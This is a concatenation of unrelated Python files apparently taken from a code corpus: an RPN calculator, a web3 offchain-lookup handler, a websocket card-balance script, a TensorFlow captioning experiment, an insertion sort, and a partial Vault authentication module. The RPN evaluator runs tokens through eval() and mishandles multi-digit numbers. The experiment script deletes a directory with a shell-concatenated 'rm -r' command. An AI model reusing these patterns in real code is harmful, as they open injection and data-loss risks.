\"\"\"\n :type tokens: List[str]\n :rtype: int\n \"\"\"\n stack = []\n for token in tokens:\n if token not in ['+', '-', '*', '/']:\n stack += token\n else:\n n1, n2 = stack.pop(), stack.pop()\n t = repr(int(eval(n1 + token + n2 + '.')))\n stack += t\n\n return int(stack[0])\n\n\ndef test():\n list = [\"2\", \"1\", \"+\", \"3\", \"*\"]\n print(Solution.evalRPN(list))\n\n\nif __name__ == '__main__':\n test()\n","sub_path":"EvaReverseNotation.py","file_name":"EvaReverseNotation.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"514135272","text":"from typing import (\n Any,\n Dict,\n)\n\nfrom eth_abi import (\n abi,\n)\nfrom eth_typing import (\n URI,\n)\n\nfrom web3._utils.request import (\n async_get_json_from_client_response,\n async_get_response_from_get_request,\n async_get_response_from_post_request,\n)\nfrom web3._utils.type_conversion import (\n to_bytes_if_hex,\n to_hex_if_bytes,\n)\nfrom web3.exceptions import (\n MultipleFailedRequests,\n Web3ValidationError,\n)\nfrom web3.types import (\n TxParams,\n)\n\n\nasync def async_handle_offchain_lookup(\n offchain_lookup_payload: Dict[str, Any],\n transaction: TxParams,\n) -> bytes:\n formatted_sender = to_hex_if_bytes(offchain_lookup_payload[\"sender\"]).lower()\n formatted_data = to_hex_if_bytes(offchain_lookup_payload[\"callData\"]).lower()\n\n if formatted_sender != to_hex_if_bytes(transaction[\"to\"]).lower():\n raise Web3ValidationError(\n \"Cannot handle OffchainLookup raised inside nested call. Returned \"\n \"`sender` value does not equal `to` address in transaction.\"\n )\n\n for url in offchain_lookup_payload[\"urls\"]:\n formatted_url = URI(\n str(url)\n .replace(\"{sender}\", str(formatted_sender))\n .replace(\"{data}\", str(formatted_data))\n )\n\n try:\n if \"{data}\" in url and \"{sender}\" in url:\n response = await async_get_response_from_get_request(formatted_url)\n elif \"{sender}\" in url:\n response = await async_get_response_from_post_request(\n formatted_url,\n data={\"data\": formatted_data, \"sender\": formatted_sender},\n )\n else:\n raise Web3ValidationError(\"url not formatted properly.\")\n except Exception:\n continue # try next url if timeout or issues making the request\n\n if (\n 400 <= response.status <= 499\n ): # if request returns 400 error, raise exception\n response.raise_for_status()\n if not 200 <= response.status <= 299: # if not 400 error, try next url\n continue\n\n result = await async_get_json_from_client_response(response)\n\n if \"data\" not in result.keys():\n raise Web3ValidationError(\n \"Improperly formatted response for offchain lookup HTTP request\"\n \" - missing 'data' field.\"\n )\n\n encoded_data_with_function_selector = b\"\".join(\n [\n # 4-byte callback function selector\n to_bytes_if_hex(offchain_lookup_payload[\"callbackFunction\"]),\n # encode the `data` from the result and the `extraData` as bytes\n abi.encode(\n [\"bytes\", \"bytes\"],\n [\n to_bytes_if_hex(result[\"data\"]),\n to_bytes_if_hex(offchain_lookup_payload[\"extraData\"]),\n ],\n ),\n ]\n )\n\n return encoded_data_with_function_selector\n raise MultipleFailedRequests(\"Offchain lookup failed for supplied urls.\")\n","sub_path":"web3/utils/async_exception_handling.py","file_name":"async_exception_handling.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"314166226","text":"from websocket import create_connection as cc\nimport os, signal, time, sys, json\nfrom datetime import datetime\nimport psycopg2\nfrom configparser import ConfigParser\nfrom database_config import db_config\nimport script_database_methods as sdm\n\ndef keyboardInterruptHandler(signal, frame):\n print('\\nCtrl+c presionado, saliendo...')\n GPIO.cleanup()\n print('GPIO cleanup done...')\n print('Nv prro')\n exit(0)\n\n# definiciones globales\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nsignal.signal(signal.SIGINT, keyboardInterruptHandler)\nconfig = ConfigParser()\nconfig.read(BASE_DIR + '/settings.ini')\nTIMEOUT_TIME = int(config['TIMEOUT']['timeout_seconds'])\nws_servida_timeout = TIMEOUT_TIME + 30\ndb_params = db_config()\n\n\ndef main(conn):\n ws = cc(\"ws://192.168.0.69:8001/dispenser/carga_remota/\", timeout=ws_servida_timeout)\n mensaje_accion = ws.recv()\n ws.close()\n mensaje = json.loads(mensaje_accion)[\"message\"]\n tipo_mensaje = mensaje[\"tipo_mensaje\"]\n if tipo_mensaje == \"control\":\n accion = json.loads(mensaje_accion)[\"message\"][\"mensaje\"].split(',')\n if accion[0] == \"carga_remota\":\n uuid_carga = accion[1] # recibe el uuid (el mensaje entrante es \"mensaje\" : \"carga_remota,uuid\")\n tarjeta = sdm.lectura_tarjeta(conn, (uuid_carga,))\n if (tarjeta): # Tarjeta existente en la BD\n mensaje = '{\"type\": \"chat_message\", \"message\": {\"tipo_mensaje\": \"comunicacion\", \"mensaje\": {\"uuid\": \"%s\", \"nombre\": \"%s\", \"saldo\": \"%d\", \"fecha\": \"%s\"}}}' % (tarjeta[1], tarjeta[2], tarjeta[3], tarjeta[4])\n else: # Tarjeta nueva\n mensaje = '{\"type\": \"chat_message\", \"message\": {\"tipo_mensaje\": \"comunicacion\", \"mensaje\": {\"uuid\": \"%s\", \"nombre\": \"%s\", \"saldo\": \"%d\", \"fecha\": \"%s\"}}}' % (uuid_carga, \"Nueva Tarjeta\", 0, datetime.today())\n # Abro, mando y cierro. Esto deberia ser una funcion unica.\n ws = cc(\"ws://192.168.0.69:8001/dispenser/carga_remota/\", timeout=ws_servida_timeout)\n ws.send(mensaje)\n ws.close()\n # Abro, espero recibir\n ws = cc(\"ws://192.168.0.69:8001/dispenser/carga_remota/\", timeout=ws_servida_timeout)\n mensaje_accion_carga = ws.recv()\n print(mensaje_accion_carga)\n mensaje_carga = json.loads(mensaje_accion_carga)[\"message\"]\n tipo_mensaje_carga = mensaje_carga[\"tipo_mensaje\"]\n if tipo_mensaje_carga == \"control\":\n print(\"recibido mensaje de carga desde la web\")\n accion_carga = json.loads(mensaje_accion_carga)[\"message\"][\"mensaje\"].split(',')\n if accion_carga[0] == \"carga\":\n nombre = accion_carga[3] # {carga, $monto, nombre, $nombre} formato paquete\n monto = float(accion_carga[1])\n fecha_carga = datetime.now().strftime(\"%d/%m/%Y - %H:%M\")\n tarjeta_actual = (uuid_carga, nombre, monto, datetime.now())\n print(tarjeta_actual)\n sdm.registro_tarjeta(conn, tarjeta_actual)\n ws.close() # y cierro.\n\n\n\ndef wait_for_system_online():\n online = False\n while True:\n if (not online):\n try:\n ws = cc(\"ws://192.168.0.69:8001/dispenser/acciones/\", timeout=5)\n online = True\n ws.close()\n except:\n time.sleep(5)\n else:\n break\n\n\nif __name__ == '__main__':\n wait_for_system_online()\n conn = sdm.create_connection(**db_params)\n while True:\n main(conn)\n","sub_path":"scripts/carga_remota.py","file_name":"carga_remota.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"454750203","text":"from __future__ import absolute_import, division, unicode_literals, print_function\nimport pandas as pd\nfrom collections import defaultdict\nimport tensorflow as tf\nimport json\nimport numpy as np\nimport sys, os, shutil\nimport random\nimport timeit\nimport collections\nimport heapq\nimport io\n\n############ params ####################################################\nmax_epochs = 100\nnum_runs = 3\nminibatch_size = 50\nresults_data_dir = '/media/compute/vol/dsg/lilian/testrun_after_refactoring/results'\nmin_token_freq = 3\nlayer_size = 512\nmethod = 'inject' # 'merge'\ndataset = 'refcoco_refrnn_compositional'\n\n##################################################################################################################################\n\ndef generate_sequence_beamsearch(predictions_function, beam_width=3, clip_len=20):\n prev_beam = Beam(beam_width)\n prev_beam.add(np.array(1.0, 'float64'), False, [ edge_index ])\n while True:\n curr_beam = Beam(beam_width)\n\n #Add complete sentences that do not yet have the best probability to the current beam, the rest prepare to add more words to them.\n prefix_batch = list()\n prob_batch = list()\n for (prefix_prob, complete, prefix) in prev_beam:\n if complete == True:\n curr_beam.add(prefix_prob, True, prefix)\n else:\n prefix_batch.append(prefix)\n prob_batch.append(prefix_prob)\n\n #Get probability of each possible next word for each incomplete prefix.\n indexes_distributions = predictions_function(prefix_batch)\n\n #Add next words\n for (prefix_prob, prefix, indexes_distribution) in zip(prob_batch, prefix_batch, indexes_distributions):\n for (next_index, next_prob) in enumerate(indexes_distribution):\n if next_index == unknown_index: #skip unknown tokens\n pass\n elif next_index == edge_index: #if next word is the end token then mark prefix as complete and leave out the end token\n curr_beam.add(prefix_prob*next_prob, True, prefix)\n else: #if next word is a non-end token then mark prefix as incomplete\n curr_beam.add(prefix_prob*next_prob, False, prefix+[next_index])\n\n (best_prob, best_complete, best_prefix) = max(curr_beam)\n if best_complete == True or len(best_prefix)-1 == clip_len: #if the length of the most probable prefix exceeds the clip length (ignoring the start token) then return it as is\n return ' '.join(index_to_token[index] for index in best_prefix[1:]) #return best sentence without the start token\n\n prev_beam = curr_beam\n\n##################################################################################################################################\nclass Beam(object):\n#For comparison of prefixes, the tuple (prefix_probability, complete_sentence) is used.\n#This is so that if two prefixes have equal probabilities then a complete sentence is preferred over an incomplete one since (0.5, False) < (0.5, True)\n\n def __init__(self, beam_width):\n self.heap = list()\n self.beam_width = beam_width\n\n def add(self, prob, complete, prefix):\n heapq.heappush(self.heap, (prob, complete, prefix))\n if len(self.heap) > self.beam_width:\n heapq.heappop(self.heap)\n\n def __iter__(self):\n return iter(self.heap)\n\n##################################################################################################################################\n\nif __name__ == '__main__':\n\n ############ load and prepare image features ###########################\n\n # Image Features --> numpy npz file includes one key/array, arr_0\n extracted_features = np.load(\"../data/refcoco/mscoco_vgg19_refcoco.npz\")['arr_0']\n #print \"type\", type (extracted_features)\n #print \"extracted_features.shape \",extracted_features.shape # (49865, 4106)\n #print \"vgg_mat[1][0] \", extracted_features[1][0] # 1.0\n #extracted_features = extracted_features[:,3:]\n #print \"extracted_features.shape \",extracted_features.shape # (49865, 4103)\n #print \"vgg_mat[1][0] \", extracted_features[1][0] # 0.0\n\n test_list =[]\n test_count = 0\n\n img_counter = 0\n sentence_counter = 0\n selected_img_features = [] #alias img_mat\n\n ########### load and prepare referring expressions dataset ##############\n refcoco_data = pd.read_json(\"../data/refcoco/refcoco_refdf.json.gz\", orient=\"split\", compression=\"gzip\")\n with open(\"../data/refcoco/refcoco_splits.json\") as f:\n splits = json.load(f)\n splitmap = {'val':'val','train':'train','testA':'test','testB':'test'}\n # for every group in split --> for every entry --> make entry in new dict\n # file2split just translates testA and testB to \"test\"?\n new_split_dict = {val:splitmap[key] for key in splits for val in splits[key]}\n\n\n # dict of objectids and ref exps\n obj2phrases = defaultdict(list)\n # dict of objectids and split (train,test or val)\n obj2split = {}\n split2obj = {'train':[],'test':[]}\n\n # iterate over json \"entries\"\n for index, row in refcoco_data.iterrows():\n # id is tuple of image and region id\n objectid = (row['image_id'], row['region_id'])\n obj2phrases[objectid].append(row['refexp'].split())\n obj2split[objectid] = new_split_dict[row['image_id']]\n\n #print \"Objects\",len(obj2phrases)\n ############ match visual data with referring expressions ###############\n ############### & set up raw data with splits ###########################\n\n raw_dataset = {\n 'train': { 'filenames': list(), 'images': list(), 'captions': list() },\n 'val': { 'filenames': list(), 'images': list(), 'captions': list() },\n 'test': { 'filenames': list(), 'images': list(), 'captions': list() },\n }\n\n # tqdm visualizes progress in the terminal :)\n for obj2phrases_item in obj2phrases: #tqdm(obj2phrases):\n\n # [:,1] means: all indices of x along the first axis, but only index 1 along the second --> this list comprehension filters out features for one image\n features_for_imageId = extracted_features[extracted_features[:,1] == obj2phrases_item[0]] #obj2phrases_item[0] is image id\n # this filters out features for the correct region\n features_for_objectId = features_for_imageId[features_for_imageId[:,2] == obj2phrases_item[1]] #obj2phrases_item[1] is region id\n\n if len(features_for_objectId) > 0:\n image = np.array(features_for_objectId[0])[3:]\n test_list.append(np.array(features_for_objectId[0])[3:])\n test_count += 1\n\n split = obj2split[obj2phrases_item]\n filename = \"_\".join([str(obj2phrases_item[0]),str(obj2phrases_item[1])])\n caption_group = []\n for ref in obj2phrases[obj2phrases_item]:\n caption_group.append(ref)\n\n image = image / np.linalg.norm(image)\n\n raw_dataset[split]['filenames'].append(filename)\n raw_dataset[split]['images'].append(image)\n raw_dataset[split]['captions'].append(caption_group)\n\n print('raw data set',len(raw_dataset['train']['captions'])) #42279\n\n print(len(raw_dataset['train']['images']) + len(raw_dataset['val']['images']) + \\\n len(raw_dataset['test']['images'])) #should be 49865\n\n print(raw_dataset['train']['captions'][0]) # output : [[u'hidden', u'chocolate', u'donut'], [u'space', u'right', u'above', u'game']]\n print(raw_dataset['train']['captions'][111]) # output : [[u'groom'], [u'groom'], [u'man']]\n\n # to compare with original scripts: here, the order is like\n # in im_mat from prepare_refcoco.py.\n print(\"count\", test_count) # 49865\n test_list = np.array(test_list)\n print(test_list.shape)\n print(\"test:: \", test_list[1][0]) # 0.0729042887688 --> like in original script (random number chosen)\n\n\n ################################################################\n # for min_token_freq in [ 3, 4, 5 ]:\n all_tokens = (token for caption_group in raw_dataset['train']['captions'] for caption in caption_group for token in\n caption)\n token_freqs = collections.Counter(all_tokens)\n vocab = sorted(token_freqs.keys(), key=lambda token: (-token_freqs[token], token))\n # discard words with very low frequency\n while token_freqs[vocab[-1]] < min_token_freq:\n vocab.pop()\n\n vocab_size = len(vocab) + 2 # + edge and unknown tokens\n print('vocab:', vocab_size)\n\n # \"word embedding\"\n token_to_index = {token: i + 2 for (i, token) in enumerate(vocab)}\n index_to_token = {i + 2: token for (i, token) in enumerate(vocab)}\n edge_index = 0\n unknown_index = 1\n\n\n ################################################################\n\n def parse(data):\n indexes = list()\n lens = list()\n images = list()\n for (caption_group, img) in zip(data['captions'], data['images']):\n for caption in caption_group: # := default is unknown\n indexes_ = [token_to_index.get(token, unknown_index) for token in caption]\n indexes.append(indexes_)\n lens.append(len(indexes_) + 1) # add 1 due to edge token\n images.append(img)\n\n maxlen = max(lens)\n\n in_mat = np.zeros((len(indexes), maxlen), np.int32)\n out_mat = np.zeros((len(indexes), maxlen), np.int32)\n for (row, indexes_) in enumerate(indexes):\n in_mat[row, :len(indexes_) + 1] = [edge_index] + indexes_\n out_mat[row, :len(indexes_) + 1] = indexes_ + [edge_index]\n return (in_mat, out_mat, np.array(lens, np.int32), np.array(images))\n\n\n (train_captions_in, train_captions_out, train_captions_len, train_images) = parse(raw_dataset['train'])\n (val_captions_in, val_captions_out, val_captions_len, val_images) = parse(raw_dataset['val'])\n (test_captions_in, test_captions_out, test_captions_len, test_images) = parse(raw_dataset['test'])\n print(\"Train captions\", np.shape(train_captions_in))\n ################################################################\n print('Training...')\n\n # for layer_size in [ 128, 256, 512 ]:\n # for method in [ 'merge', 'inject' ]:\n for run in range(1, num_runs + 1):\n model_name = '_'.join([str(x) for x in [method, dataset, min_token_freq, layer_size, run]])\n if os.path.isdir(results_data_dir + '/' + model_name):\n os.system(\"rm -r \" + results_data_dir + '/' + model_name)\n os.makedirs(results_data_dir + '/' + model_name)\n\n print()\n print('-' * 100)\n print(dataset, min_token_freq, layer_size, method, run)\n print()\n\n tf.reset_default_graph()\n\n # Sequence of token indexes generated thus far included start token (or full correct sequence during training).\n seq_in = tf.placeholder(tf.int32, shape=[None, None], name='seq_in') # [seq, token index]\n # Length of sequence in seq_in.\n seq_len = tf.placeholder(tf.int32, shape=[None], name='seq_len') # [seq len]\n # Images\n image = tf.placeholder(tf.float32, shape=[None, 4103], name='image') # [seq, image feature]\n # Correct sequence to generate during training without start token but with end token\n seq_target = tf.placeholder(tf.int32, shape=[None, None], name='seq_target') # [seq, token index]\n\n # Number of sequences to process at once.\n batch_size = tf.shape(seq_in)[0]\n # Number of tokens in generated sequence.\n num_steps = tf.shape(seq_in)[1]\n\n with tf.variable_scope('image'):\n # Project image vector into a smaller vector.\n\n W = tf.get_variable('W', [4103, layer_size], tf.float32, tf.contrib.layers.xavier_initializer())\n b = tf.get_variable('b', [layer_size], tf.float32, tf.zeros_initializer())\n\n post_image = tf.matmul(image, W) + b\n\n with tf.variable_scope('prefix_encoder'):\n # Encode each generated sequence prefix into a vector.\n\n # Embedding matrix for token vocabulary. -> xavier: weight initialization!\n embeddings = tf.get_variable('embeddings', [vocab_size, layer_size], tf.float32,\n tf.contrib.layers.xavier_initializer()) # [vocabulary token, token feature]\n\n # 3tensor of tokens in sequences replaced with their corresponding embedding.\n # look up ids in seq_in in full vocab\n embedded = tf.nn.embedding_lookup(embeddings, seq_in) # [seq, token, token feature]\n\n print (\"embedded shape: \", np.shape(embedded))\n # t = tf.expand_dims(post_image, 1)\n if method == 'inject':\n rnn_input = tf.concat([embedded, tf.tile(tf.expand_dims(post_image, 1), [1, num_steps, 1])], axis=2)\n else:\n rnn_input = embedded\n\n # Use an LSTM to encode the generated prefix.\n init_state = tf.contrib.rnn.LSTMStateTuple(c=tf.zeros([batch_size, layer_size]),\n h=tf.zeros([batch_size, layer_size]))\n cell = tf.contrib.rnn.BasicLSTMCell(layer_size)\n (prefix_vectors, _) = tf.nn.dynamic_rnn(cell, rnn_input, sequence_length=seq_len,\n initial_state=init_state) # [seq, prefix position, prefix feature]\n\n # Mask of which positions in the matrix of sequences are actual labels as opposed to padding.\n token_mask = tf.cast(tf.sequence_mask(seq_len, num_steps), tf.float32) # [seq, token flag]\n\n with tf.variable_scope('softmax'):\n # Output a probability distribution over the token vocabulary (including the end token)\n\n if method == 'merge':\n\n softmax_input = tf.concat([prefix_vectors, tf.tile(tf.expand_dims(post_image, 1), [1, num_steps, 1])],\n axis=2)\n softmax_input_size = layer_size + layer_size # state + image\n else:\n softmax_input = prefix_vectors\n softmax_input_size = layer_size\n\n W = tf.get_variable('W', [softmax_input_size, vocab_size], tf.float32,\n tf.contrib.layers.xavier_initializer())\n b = tf.get_variable('b', [vocab_size], tf.float32, tf.zeros_initializer())\n logits = tf.reshape(tf.matmul(tf.reshape(softmax_input, [-1, softmax_input_size]), W) + b,\n [batch_size, num_steps, vocab_size])\n predictions = tf.nn.softmax(logits) # [seq, prefix position, token probability]\n last_prediction = predictions[:, -1]\n\n losses = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=seq_target, logits=logits) * token_mask\n total_loss = tf.reduce_sum(losses)\n train_step = tf.train.AdamOptimizer().minimize(total_loss)\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n\n num_params = 0\n for v in sess.graph.get_collection('trainable_variables'):\n num_params += np.prod(v.get_shape()).value\n\n print('epoch', 'val loss', 'duration', sep='\\t')\n run_start = start = timeit.default_timer()\n\n # validation_loss = 0\n # for i in range(len(test_images)//minibatch_size):\n # minibatch_validation_loss = sess.run(total_loss, feed_dict={\n # seq_in: val_captions_in [i*minibatch_size:(i+1)*minibatch_size],\n # seq_len: val_captions_len[i*minibatch_size:(i+1)*minibatch_size],\n # seq_target: val_captions_out[i*minibatch_size:(i+1)*minibatch_size],\n # image: test_images[i*minibatch_size:(i+1)*minibatch_size]\n # })\n # validation_loss += minibatch_validation_loss\n # print(0, round(validation_loss, 3), round(timeit.default_timer() - start), sep='\\t')\n last_validation_loss = 1000000\n\n trainingset_indexes = list(range(len(train_images)))\n for epoch in range(1, max_epochs + 1):\n random.shuffle(trainingset_indexes)\n\n start = timeit.default_timer()\n for i in range(len(trainingset_indexes) // minibatch_size):\n minibatch_indexes = trainingset_indexes[i * minibatch_size:(i + 1) * minibatch_size]\n sess.run(train_step, feed_dict={\n seq_in: train_captions_in[minibatch_indexes],\n seq_len: train_captions_len[minibatch_indexes],\n seq_target: train_captions_out[minibatch_indexes],\n image: train_images[minibatch_indexes]\n })\n\n validation_loss = 0\n for i in range(len(test_images) // minibatch_size):\n minibatch_validation_loss = sess.run(total_loss, feed_dict={\n seq_in: val_captions_in[i * minibatch_size:(i + 1) * minibatch_size],\n seq_len: val_captions_len[i * minibatch_size:(i + 1) * minibatch_size],\n seq_target: val_captions_out[i * minibatch_size:(i + 1) * minibatch_size],\n image: val_images[i * minibatch_size:(i + 1) * minibatch_size] # test images\n })\n validation_loss += minibatch_validation_loss\n print(epoch, round(validation_loss, 3), round(timeit.default_timer() - start), sep='\\t')\n if validation_loss > last_validation_loss:\n break\n last_validation_loss = validation_loss\n print(\"save model\", results_data_dir + '/' + model_name + '/model')\n saver.save(sess, results_data_dir + '/' + model_name + '/model')\n\n saver.restore(sess, tf.train.latest_checkpoint(results_data_dir + '/' + model_name))\n\n print()\n print('evaluating...')\n print()\n\n captions = list()\n for (i, image_input) in enumerate(raw_dataset['test']['images']):\n caption = generate_sequence_beamsearch(lambda prefixes: sess.run(last_prediction, feed_dict={\n seq_in: prefixes,\n seq_len: [len(p) for p in prefixes],\n image: image_input.reshape([1, -1]).repeat(len(prefixes), axis=0)\n }))\n captions.append(caption)\n\n vocab_used = len({word for caption in captions for word in caption.split(' ')})\n\n with open(results_data_dir + '/' + model_name + '/generated_captions.json', 'w') as f:\n print(str(json.dumps([\n {\n 'image_id': image_id,\n 'caption': caption\n }\n for (image_id, caption) in enumerate(captions)\n ])), file=f)\n\n print()\n print('Duration:', round(timeit.default_timer() - run_start), 's')\n print()\n\n######### new\n oids = list()\n captions_new = list()\n for (i, image_input) in enumerate(raw_dataset['test']['images']):\n caption = generate_sequence_beamsearch(lambda prefixes: sess.run(last_prediction, feed_dict={\n seq_in: prefixes,\n seq_len: [len(p) for p in prefixes],\n image: image_input.reshape([1, -1]).repeat(len(prefixes), axis=0)\n }))\n captions_new.append([caption])\n\n for (i, item) in enumerate(raw_dataset['test']['filenames']):\n oids.append(item.split(\"_\")[1])\n\n dict4eval = defaultdict(list)\n for (idx, pair) in enumerate(zip(oids, captions_new)):\n dict4eval[pair[0]] = pair[1]\n with open(results_data_dir + '/' + '4evalrefactoredexp_' + model_name + '.json', 'w') as f:\n json.dump(dict4eval, f)\n","sub_path":"src/refactored_experiment.py","file_name":"refactored_experiment.py","file_ext":"py","file_size_in_byte":20056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"33715699","text":"\n\nfrom xai.brain.wordbase.nouns._hat import _HAT\n\n#calss header\nclass _HATTED(_HAT, ):\n\tdef __init__(self,): \n\t\t_HAT.__init__(self)\n\t\tself.name = \"HATTED\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"hat\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_hatted.py","file_name":"_hatted.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"452330517","text":"\"\"\"\nThe Insertion Sort is simple sorting algorithm with O(n^2) time complexity.\nIt always maintains a sorted sublist in the lower position of the list. \nEach new item is then \"inserted\" back to the previous sublist in such \nthat the sorted sublist is one item larger.\n\"\"\"\n\n\nfrom typing import List, NoReturn\n\n\ndef number_insertion_sort(data_to_sort: List) -> NoReturn:\n\n for index in range(1, len(data_to_sort)):\n key = data_to_sort[index] # 4\n sorted_position = index-1 # 0\n\n while sorted_position >= 0 and key < data_to_sort[sorted_position]:\n # Swap the smaller value with compared index value\n data_to_sort[sorted_position + 1] = data_to_sort[sorted_position] \n sorted_position -= 1\n\n data_to_sort[sorted_position + 1] = key\n \n# 1st random number sorting -> 6.154s\n# 2st random number sorting -> 6.296s\n# 3st random number sorting -> 6.214s\n# 4st random number sorting -> 6.847s\n# 5st random number sorting -> 5.578s\n","sub_path":"insertion_sort/basic_insertion_sort.py","file_name":"basic_insertion_sort.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"26519168","text":"from datetime import datetime, timedelta\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom threading import Thread\nfrom .exceptions import VaultConfigurationError, VaultCredentialProviderError\nimport asyncio\nimport distutils.util\nimport dateutil.parser\nimport portalocker\nimport json\nimport logging\nimport os.path\nimport os\nimport pytz\nimport hvac\nimport threading\nimport stat\nimport random\n\nlogger = logging.getLogger(__name__)\n\n# Constants\nAUTH_TYPE_APPID = 'app-id'\nAUTH_TYPE_APPROLE = 'approle'\nAUTH_TYPE_AWS_IAM = 'aws'\nAUTH_TYPE_KUBERNETES = 'kubernetes'\nAUTH_TYPE_SSL = 'ssl'\nAUTH_TYPE_TOKEN = 'token'\nTOKEN_REFRESH_SECONDS = (60 * 10)\nTOKEN_RENEW_INTERVAL = (60 * 5)\n\n# Basic Vault configuration\nVAULT_URL = os.environ.get('VAULT_URL')\nVAULT_CACERT = os.environ.get('VAULT_CACERT')\nVAULT_SSL_VERIFY = not bool(distutils.util.strtobool(os.environ.get('VAULT_SKIP_VERIFY', 'no')))\nVAULT_DEBUG = bool(distutils.util.strtobool(os.environ.get('VAULT_DEBUG', 'no')))\nVAULT_TOKEN_LEASE_RENEW_SECONDS = int(os.environ.get(\"VAULT_TOKEN_LEASE_RENEW_SECONDS\", '3600'))\n\n# Vault Authentication Option: Token\nVAULT_TOKEN = os.getenv(\"VAULT_TOKEN\")\n\n# Vault Authentication Option: AppID\nVAULT_APPID = os.getenv(\"VAULT_APPID\")\nVAULT_USERID = os.getenv(\"VAULT_USERID\")\n\n# Vault Authentication Option: AWS IAM\nVAULT_IAM_HEADER_VALUE = os.getenv('VAULT_IAM_HEADER_VALUE')\nVAULT_IAM_ROLE = os.getenv('VAULT_IAM_ROLE')\nVAULT_IAM_REGION = os.getenv('VAULT_IAM_REGION', 'us-east-1') # This is the signature signing region, not the endpoint region\n\n# Vault Authentication Option: Kubernetes\nVAULT_KUBERNETES_ROLE = os.getenv('VAULT_KUBERNETES_ROLE')\nVAULT_KUBERNETES_TOKEN_PATH = os.getenv('VAULT_KUBERNETES_TOKEN_PATH')\nVAULT_KUBERNETES_AUTH_PATH = os.getenv('VAULT_KUBERNETES_AUTH_PATH', AUTH_TYPE_KUBERNETES)\n\n# Vault Authentication Option: SSL Client Certificate\nVAULT_SSLCERT = os.getenv(\"VAULT_SSLCERT\")\nVAULT_SSLKEY = os.getenv(\"VAULT_SSLKEY\")\n\n# Vault Authentication Option: AppRole\nVAULT_ROLEID = os.getenv(\"VAULT_ROLEID\")\nVAULT_SECRETID = os.getenv(\"VAULT_SECRETID\")\n\n# File path to use for caching the vault token\nVAULT_TOKEN_CACHE = os.getenv(\"VAULT_TOKEN_CACHE\", \".vault-token\")\nVAULT_AWS_CACHE = os.getenv(\"VAULT_AWS_CACHE\", \".vault-aws\")\nVAULT_DB_CACHE = os.getenv(\"VAULT_DB_CACHE\", \".vault-db\")\n\n# Secret path to obtain database credentials\nVAULT_DATABASE_PATH = os.environ.get(\"VAULT_DATABASE_PATH\")\nVAULT_DATABASE_RETRY_DELAY = float(os.environ.get(\"VAULT_DATABASE_RETRY_DELAY\", '2'))\nVAULT_DATABASE_LEASE_RENEW_SECONDS = int(os.environ.get(\"VAULT_DATABASE_LEASE_RENEW_SECONDS\", '3600'))\n\n# Secret path to obtain AWS credentials\nVAULT_AWS_PATH = os.environ.get(\"VAULT_AWS_PATH\")\n\n# PostgreSQL role to assume upon connection\nDATABASE_OWNERROLE = os.environ.get(\"DATABASE_OWNERROLE\")\n\n# Thread local storage used to store the VaultAuthenticator instance\nthreadLocal = threading.local()\n\n\nclass VaultAuthenticator(object):\n\n @classmethod\n def has_envconfig(cls):\n has_url = bool(VAULT_URL)\n has_token = bool(VAULT_TOKEN)\n has_appid = (VAULT_APPID and VAULT_USERID)\n has_iam = (VAULT_IAM_HEADER_VALUE and VAULT_IAM_ROLE)\n has_kube = (VAULT_KUBERNETES_ROLE and VAULT_KUBERNETES_TOKEN_PATH)\n has_ssl = (VAULT_SSLCERT and VAULT_SSLKEY)\n has_approle = (VAULT_ROLEID and VAULT_SECRETID)\n return has_url and (has_token or has_appid or has_iam or has_kube or has_ssl or has_approle)\n\n\n @classmethod\n def fromenv(cls):\n if VAULT_TOKEN:\n return cls.token(VAULT_URL, VAULT_TOKEN)\n elif VAULT_APPID and VAULT_USERID:\n return cls.app_id(VAULT_URL, VAULT_APPID, VAULT_USERID)\n elif VAULT_IAM_HEADER_VALUE and VAULT_IAM_ROLE:\n return cls.aws_iam(VAULT_URL, VAULT_IAM_HEADER_VALUE, VAULT_IAM_ROLE)\n elif VAULT_KUBERNETES_ROLE and VAULT_KUBERNETES_TOKEN_PATH:\n return cls.kubernetes(VAULT_URL, VAULT_KUBERNETES_ROLE, VAULT_KUBERNETES_TOKEN_PATH)\n elif VAULT_ROLEID and VAULT_SECRETID:\n return cls.approle(VAULT_URL, VAULT_ROLEID, VAULT_SECRETID)\n elif VAULT_SSLCERT and VAULT_SSLKEY:\n return cls.ssl_client_cert(VAULT_URL, VAULT_SSLCERT, VAULT_SSLKEY)\n raise VaultConfigurationError(\"Unable to configure Vault authentication from the environment\")\n\n\n @classmethod\n def app_id(cls, url, app_id, user_id):\n creds = (app_id, user_id)\n return cls(url, creds, AUTH_TYPE_APPID, AUTH_TYPE_APPID)\n\n\n @classmethod\n def approle(cls, url, role_id, secret_id=None, mountpoint=AUTH_TYPE_APPROLE):\n creds = (role_id, secret_id)\n return cls(url, creds, AUTH_TYPE_APPROLE, mountpoint)\n\n\n @classmethod\n def aws_iam(cls, url, header_value, role):\n creds = (header_value, role)\n return cls(url, creds, AUTH_TYPE_AWS_IAM, AUTH_TYPE_AWS_IAM)\n\n\n @classmethod\n def kubernetes(cls, url, role, token_path, mountpoint=VAULT_KUBERNETES_AUTH_PATH):\n with open(token_path, 'r') as token_file:\n token = token_file.read()\n creds = (role, token)\n return cls(url, creds, AUTH_TYPE_KUBERNETES, mountpoint)\n\n\n @classmethod\n def ssl_client_cert(cls, url, certfile, keyfile):\n if not os.path.isfile(certfile) or not os.access(certfile, os.R_OK):\n raise VaultCredentialProviderError(\"File not found or not readable: %s\" % certfile)\n if not os.path.isfile(keyfile) or not 